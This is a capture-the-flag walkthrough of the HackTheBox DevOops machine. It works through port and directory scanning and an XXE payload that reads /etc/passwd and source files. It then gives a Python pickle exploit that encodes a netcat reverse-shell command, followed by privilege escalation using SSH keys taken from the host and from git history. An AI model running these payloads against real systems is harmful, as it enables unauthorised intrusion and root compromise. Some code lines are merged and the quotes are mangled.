Following is the HackTheBox DevOops machine’s walkthrough
Vulnerability Exploited: XML External Entity (XXE) attack, Python Pickle library code Execution vulnerability.
Enumeration:
Nmap port scan:
Command: nmap -A -T4 --open --reason 10.10.10.91
Exploit:
Upon accessing Web-server, it appears to some kind of Blogfeeder application which is under construction. (On second line it shows us local file name feed.py which we will need later)
Start dirbuster with following settings: [Set Flag “Use Blank Extension” enabled.]
Dirbuster results:
Dirbuster identifies two Files /upload and /feed.
/upload looks interesting:
Create a text file called upload.txt with some content in it.
Try to upload file upload.txt:
Target is checking for XML elements: Author, Subject and Content.
After searching on Google for XML based attacks found following OWASP link for XML External Entity (XXE) attack which can lead to exposure of target files such as /etc/passwd.
Following is a snippet from above reference link:
Create new file upload.xml with the following content:
<?xml version=”1.0" encoding=”ISO-8859–1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM “file:///etc/passwd” >]>
<creds>
<Author>&xxe;</Author>
<Subject>gaurav</Subject>
<Content>gaurav</Content>
</creds>
Try to upload file upload.xml:
Got back content of file /etc/passwd:
Grab the request this request in Burp proxy. and send it to the repeater. (Right click on captured request and click on ‘Send to Repeater’)
Run the same request in repeater tab and check the output.
On the Home web page of the service we saw local file feed.py. Let’s try to access this file. Modify above request and send it again.
On looking at the partial content of feed.py one more URI method is present, i.e., /newpost with POST method. Also looking at code of /newpost route, it uses Python’s pickle library which is vulnerable to code execution, if python code is given in request body.
Send GET request to web URI /newpost. Capture this request in Burp suite and send it to repeater.
In repeater, change request method to POST (Right click on request and select “Change request method”)
Again, from looking at the code of /newpost we know code performs Base64 decode operation on input and then executes it. So let's create an exploit which will create an encoded payload.
Exploit code (Filename pickle_encode.py):
import pickle
from base64 import urlsafe_b64encode as b64encodecmd = “””rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 4444 >/tmp/f”””
class PleaseSubscribe(object):
def __reduce__(self):
import os
return(os.system,(cmd,))print b64encode(pickle.dumps(PleaseSubscribe()))
Execute exploit code to generate encoded payload:
Paste above output in HTTP-Body of request:
Start a netcat listener on port 4444 and send request:
On executing the above request, we got shell to target machine:
Spawn bash shell:
Command: python -c ‘import pty; pty.spawn(“/bin/bash”)’
Privilege Escalation:
While performing privilege escalation checks, found 1 private SSH Key in user roosa’s home directory.
Copy this SSH key on our local machine and set permission bit to 600.
Try to SSH to target machine using user roosa and copied SSH private key.
Command: ssh -i ssh_private_key2.key roosa@10.10.10.91
Got access to the target machine as roosa.
In roosa’s home directory, found Git repository of project init. Let’s check git logs of this project.
One of the git commit entry to states “reverted accidental commit with proper key”.
After checking commit difference with one commit before this commit, we found one SSH key (highlighted in Red):
Copy above SSH key on local machine and set permission bit to 600.
Try SSH using this new SSH key.
Successfully logged in as root!
